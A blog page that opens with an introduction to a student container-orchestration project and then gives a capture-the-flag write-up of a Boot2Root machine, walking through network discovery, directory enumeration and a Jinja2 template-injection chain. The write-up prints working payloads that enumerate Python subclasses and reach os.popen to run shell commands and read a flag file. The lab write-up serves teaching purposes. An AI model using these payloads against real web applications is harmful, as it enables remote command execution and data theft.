Poseidon isn’t just a course project, it’s designed to be a reusable module. We will be open-sourcing it because every university, club, or small company that wants to host an interactive lab shouldn’t have to reinvent the wheel.

What about existing platforms like CTFd?

If you’ve been in the CTF space, you’re likely thinking of platforms like CTFd and its ctfd-whale plugin. These are fantastic, all-in-one solutions for running a complete competition

However, the dynamic container components are often just that: plugins, tightly coupled to the main platform. They solve the problem for CTFd

My goal for this project is different; I wanted to build a decoupled, general-purpose orchestration engine (Poseidon) that could be used with any platform, whether it’s our OrcaCTF, a custom-built site, or even non-CTF uses like educational sandboxes or on-demand coding labs.

Poseidon is designed to be the engine, not the entire car. This separation of concerns is a core part of our design philosophy.

Follow along as I dive into:

The master process architecture and API design.
Dynamic subdomain routing.
Worker process and Docker SDK integration
Observability with Prometheus and Grafana
Deployment, auto-scaling and lessons learned
Security details like container isolation strategies

By the end, we’ll have a fully functional orchestration engine, a CTF platform and a deep understanding of how distributed systems work under the hood.

The ocean is deep. Let’s see how deep Poseidon can go.

This is Part-1 of the “Building Poseidon” series. Follow along as we build a custom container orchestration engine from scratch.

A Note on Terminology

Throughout this series, I use "I" when discussing Poseidon's architecture and implementation because I'm building this orchestration engine independently as my contribution to our team's larger OrcaCTF platform.

My teammates are handling other critical pieces: Piyush is designing the CTF challenges themselves, while Lakshya and Samanyu are building the frontend and integrating scoring systems. Poseidon is the infrastructure layer that makes those challenges accessible in isolated, on-demand environments.

This series documents my specific journey building that infrastructure: the decisions I made, the problems I hit, and the solutions I found.

Terrier CTF [Part 1]: Network Reconnaissance to SSTI: The Methodology Beneath the Exploit

Rudra Ponkshe — Mon, 20 Oct 2025 05:30:40 GMT

Step 0: Network Address Discovery

The Terrier CTF Boot2Root machine presented an interesting challenge from the start: identifying the machine’s IP address on the local network. While this might seem quite straightforward in theory, the practical reality of VM networking configurations often introduces unexpected complexity which is worth documenting.

Usually, most Boot2Root VMs do us a favor and print their IP address to the console when they boot. Without this convinience, we need a more systematic approach to network discovery. I will be demonstrating the approach I used when using VMWare Workstation Pro on my Ubuntu machine.

First, ensure that the networking mode is set to NAT. This ensures that the machines are on the same virtual network segment and can access each other. Following this, in the Advanced settings menu of the dialog box, record the MAC address.

Then using the arp -a command on the shell, we get the list of various IP addresses associated with the physical addresses

Without console IP disclosure, three discovery vectors exist: ARP cache inspection (fast, requires same subnet), nmap subnet sweep (thorough, time-intensive), or DHCP lease examination (requires hypervisor access). ARP cache provided sufficient granularity, two candidates versus 254; making it the optimal effort-to-information ratio. The ARP command shows the list of IP addresses and their corresponding MAC addresses that your system has recently communicated with on the local network

💡

Documentation note: Screenshots in this series span multiple testing sessions, so you may notice the target IP address changes between sections. This reflects the dynamic nature of DHCP in virtualized environments and doesn't affect the methodology demonstrated.

Step 1: Reconnaissance

Now that we have the IP address, I proceeded with a standard nmap scan to identify open ports. The scan revealed ports 22 (SSH) and 5000 (HTTP) were accessible.

The presence of password based authentication in ssh shows it’s a worthy attack vector, and opening accessing the port 5000 using a web-browser reveals a static web page titled R&D portal.

SSH exploit:

SSH authentication without username enumeration or organizational context is at best, brute force. This approach is statistically futile in CTF environments which are designed around exploiting than guessing. Port 5000 suggests custom application development ( HTTP service on non-standard port ), indicating a higher probability of implementation vulnerabilities than the hardened SSH daemons.

Web page exploit:

The homepage served on port 5000 appeared completely static; buttons were non-functional, no dynamic content was visible, and no obvious navigation paths existed. This warranted directory enumeration using gobuster with the DirBuster wordlist from SecLists, which discovered a /page endpoint containing a text input field with greeting functionality.

The greeting mechanism suggested potential Server-Side Template Injection. Arithmetic evaluation ({{7×7}}→49) provides unambiguous confirmation. If the server returns ‘Hello 49!’, template processing occurred server side. String operations could reflect client-side JavaScript. Mathematical mutation offers binary clarity, either the template executed, or it didn’t.

💡

SSTI ( Server Side Template Injection ) occurs when web applications unsafely embed user input directly into template engines (Jinja2, Twig etc) allowing attackers to inject malicious template directives which execute as server side code. Read more here

As a standard practice, I tried to find out all the available classes using the payload {{''.class.mro[1].subclasses()}}. Effectively, this payload traverses to the base object class of the empty string using the MRO method, which can traverse the parent classes of a given class. The subclasses() method helps us enumerate the currently available modules, which may be used to set up a reverse-shell.

Upon running the payload, a long list of empty strings along with a singular class name was returned It looked something like [, , , , , , , , ,…..,typing.Any, , , , …..] In order to optimize the effort, I tried searching for the _wrap_close module, which helps in gaining access to the OS module. The _wrap_close wraps file like objects, and critically its __init__.__globals__ dictionary typically references to system modules like sys, os which are required for file operations. It is a reliable, and well documented path from the template context to OS-level execution. It is consistently available across Python versions.

The payload used was {% for sc in ''.class.mro[1].subclasses() %}{% if sc.name == '_wrap_close' %}{{ loop.index0 }}{% endif %}{% endfor %}

Running this command is expected to return is the index of the _wrap_close module, and sure enough, the number 140 was returned.

The next step is trying to access the os module from this, so I first tried this payload: {{ ''.class.mro[1].subclasses()[140].init.globals['os'].listdir() }}. This payload effectively tried to access the os module via the __globals__ directory of the class’ __init__ method. os.listdir() is a basic function which lists the files in the current directory.

The direct __globals__['os'] approach returned HTTP 500, indicating either namespace limitations or filtering. Since __builtins__ provides Python's core import machinery and typically exists in all execution contexts, pivoting to dynamic import via __import__ bypasses potential restrictions on pre-imported modules. I tried the payload {{ ‘‘.__class__.__mro__[1].__subclasses__()[140].__init__.__globals__[‘__builtins__’][‘__import__’](‘os’).popen(‘ls -la’).read() }}

The payload finally succeeded, and the output shows the contents of the filesystem of the www-data user, which is a common username used for service accounts used to serve web content over the server. One of the file, F14@_0n3.txt stands out in particular, and may reveal the value of the first flag. The app.py is probably the process which the application connects to, reading this could provide more vulnerabilities or logic flaws.

Slightly modifying the payload to read the F14@_0n3.txt file instead of listing the directory structure reveals the first flag to us.

The first flag secured, but www-data user access is merely a foothold, not privilege. The SSTI vulnerability that gave us file reading capabilities can offer something far more valuable: Arbitrary Command Execution. This is a common way of establishing presence.

💡

Next in series: Terrier CTF [Part 2]: PCAP Dissection: Carving Secrets from Captured Packets

💡

Shout out to my friend, Abhijeet for the awesome cover image he designed!